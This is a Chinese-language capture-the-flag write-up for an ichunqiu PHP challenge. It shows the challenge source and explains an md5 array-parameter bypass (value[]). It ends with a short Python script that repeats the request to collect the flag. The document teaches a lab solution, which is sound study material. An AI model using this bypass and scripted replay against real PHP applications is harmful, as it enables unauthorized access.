題目提示：這個真的是爆破。

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

 

與前兩個題類似，先進行程式碼審計。
$value = $_REQUEST[‘value’];可以看出PHP將值儲存到value中。即xxx.php？value=x
由if判斷條件看出
SESSION[‘whoami’]應與value的第1第2個字元相同（即value=eaxxxx），並且進行MD5加密。（經百度得知，陣列型別不進行MD5加密，所以想法是傳value[]）
最後的if得出需要經過11次才能顯示flag。
之後進項爆破，可以手動，可以利用Python指令碼
手動爆破：


一共需要進行重複10次
最後會出來flag

python指令碼注入：（Python指令碼注入原理與手工注入相同）

import requests

url='http://2b974b9732094bcf9490176750686b3871a7cfcaf44c47fe.game.ichunqiu.com?value[]='

a=requests.session()
b=a.get(url+'ea')

for i in range(11):
	c=a.get(url+b.text[:2])
	b=c
	print(b.text)
	pass

將指令碼執行完，只需看最後一個輸出就行。